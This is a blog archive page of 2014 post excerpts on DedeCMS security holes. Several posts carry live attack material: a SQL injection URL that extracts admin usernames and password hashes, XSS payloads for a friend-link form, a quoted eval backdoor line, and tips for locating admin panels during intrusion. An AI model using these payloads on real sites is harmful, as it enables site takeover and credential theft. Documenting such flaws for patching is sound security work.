上一页 1 ··· 71 72 73 74 75 76 77 78 79 ··· 82 下一页
  2014年3月21日
摘要: 该漏洞是cyg07在乌云提交的, 漏洞文件: plus\feedback.php。存在问题的代码:view source01...02if($comtype=='comments')03{04$arctitle=addslashes($title);05if($msg!='')06{//$typeid变量未做初始化07$inquery= "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,` 阅读全文
posted @ 2014-03-21 15:00 milantgh 阅读(1095) 评论(0) 推荐(0) 编辑
摘要: 简要描述:DedeCMS V5.7 SP1正式版UTF-8 GBK版本疑似被植入一句话后门前几日下载并不存在此代码详细说明:shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));漏洞证明:shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));修复方案:删除@eval(file_get_contents('php://input')); 阅读全文
posted @ 2014-03-21 14:53 milantgh 阅读(1107) 评论(0) 推荐(0) 编辑
摘要: 漏洞版本:DedeCms 5.x漏洞描述:DedeCms是免费的PHP网站内容管理系统。plus/carbuyaction.php里没有对变量进行严格的过滤出现漏洞的两个文件为:Include/payment/alipay.phpInclude/payment/yeepay.php漏洞均出现在respond方法里Include/payment/alipay.php......function respond(){if(!empty($_POST)){foreach($_POST as $key => $data){ $_GET[$key]= $data;}}/* 引入配置文件 * 阅读全文
posted @ 2014-03-21 14:50 milantgh 阅读(1395) 评论(0) 推荐(0) 编辑
摘要: 漏洞地址及证明:/include/dialog/config.php?adminDirHand="/> 阅读全文
posted @ 2014-03-21 14:48 milantgh 阅读(311) 评论(0) 推荐(0) 编辑
摘要: 这个问题应该很久了 最近发现有用这个的蠕虫,dede 前台提交友情链接 只用htmlspecialchars简单处理了一下 可以插入代码plus/flink_add.php 提交:表单中提交 图片地址http://111.cc ' onerror='alert(98);'http://111.cc 'onerror=location.href='http://www.baidu.com只用htmlspecialchars做了处理 没有判断数据有效性?1234567891011121314151617$msg = htmlspecialchars($msg 阅读全文
posted @ 2014-03-21 14:40 milantgh 阅读(337) 评论(0) 推荐(0) 编辑
摘要: EXP:Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'ormid=@`\'`/*!50000union*//*!50000select*/1,2,3,(selectCONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_ 阅读全文
posted @ 2014-03-21 14:32 milantgh 阅读(1048) 评论(0) 推荐(0) 编辑
摘要: magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误在magic_quotes_gpc=On的情况下,如果输入的数据有单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符都会被加上反斜线。这些转义是必须的,如果这个选项为off,那么我们就必须调用addslashes这个函数来为字符串增加转义。正是因为这个选项必须为On,但是又让用户进行配置的矛盾,在PHP6中删除了这个选项,一切的编程都需要在mag 阅读全文
posted @ 2014-03-21 14:25 milantgh 阅读(572) 评论(0) 推荐(0) 编辑
摘要: 此漏洞无视gpc转义,过80sec注入防御。补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。include/dedesql.class.php12345678910111213if(isset($GLOBALS['arrs1'])){$v1=$v2='';for($i=0;isset($arrs1[$i]);$i++){$v1.=chr($arrs1[$i]);}for($i=0;isset($arrs2[$i]);$i++){$v2.= 阅读全文
posted @ 2014-03-21 14:12 milantgh 阅读(640) 评论(0) 推荐(0) 编辑
摘要: publicfunction downloads($name){ $name_tmp = explode("_",$name); $type = $name_tmp[0]; $file_time = explode(".",$name_tmp[3]); $file_time = $file_time[0]; $file_date = date("Y/md",$file_time); $file_dir = SITE_PATH."/data/uploads/$type/$file_date/";if(!file_ex 阅读全文
posted @ 2014-03-21 14:07 milantgh 阅读(465) 评论(0) 推荐(0) 编辑
  2014年3月20日
摘要: 经过很多次的渗透经验,我总结了一套网站后台查找的方法,写出来供大家分享:步骤如下:1.查找网站的robots.txt文件或者sitemap.xml文件,里面有很多目录可利用2.使用御剑逐级渗透,一般都能找到网站后台(找数据库文件也是如此) 阅读全文
posted @ 2014-03-20 19:34 milantgh 阅读(794) 评论(0) 推荐(0) 编辑
上一页 1 ··· 71 72 73 74 75 76 77 78 79 ··· 82 下一页